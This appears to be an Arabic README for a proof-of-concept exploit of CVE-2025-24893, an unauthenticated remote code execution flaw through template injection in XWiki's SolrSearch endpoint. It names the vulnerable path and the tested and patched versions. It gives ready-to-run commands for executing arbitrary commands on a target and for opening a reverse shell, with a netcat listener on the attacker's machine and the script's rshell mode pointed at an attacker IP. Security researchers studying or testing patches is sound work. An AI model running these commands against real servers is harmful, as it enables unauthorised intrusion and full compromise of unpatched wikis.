
PoC لاستغلال RCE بدون مصادقة في XWiki SolrSearch (CVE-2025-24893). تنفيذ الأوامر + شل عكسي.
إثبات مفهوم لتنفيذ التعليمات البرمجية عن بُعد (RCE) بدون مصادقة لـ XWiki SolrSearch (CVE-2025-24893). تنفيذ أوامر + صدفة عكسية.
إثبات مفهوم لثغرة حقن القالب SolrSearch في XWiki والتي تؤدي إلى تنفيذ تعليمات برمجية عن بُعد بدون مصادقة.
تم اختباره ضد XWiki Debian 15.10.8 (تم إصلاحه في 15.10.11 / 16.4.1 / 16.5.0RC1).
⚠️ للاستخدام التعليمي فقط. لا تشغّل هذا ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.
/xwiki/bin/get/Main/SolrSearch.pip install requests
حدد المضيف الهدف (والمسار الاختياري) عند تشغيل السكربت.
نفّذ أوامر أساسية:
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "id"
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "whoami"
ابدأ صدفة عكسية:
# On attacker box
nc -lvnp 4444
# From the PoC
python3 xwiki_solr_rce.py --target http://wiki.example.tld rshell <attacker_ip> 4444
/xwiki/bin/get/Main/SolrSearch?media=rss&text=...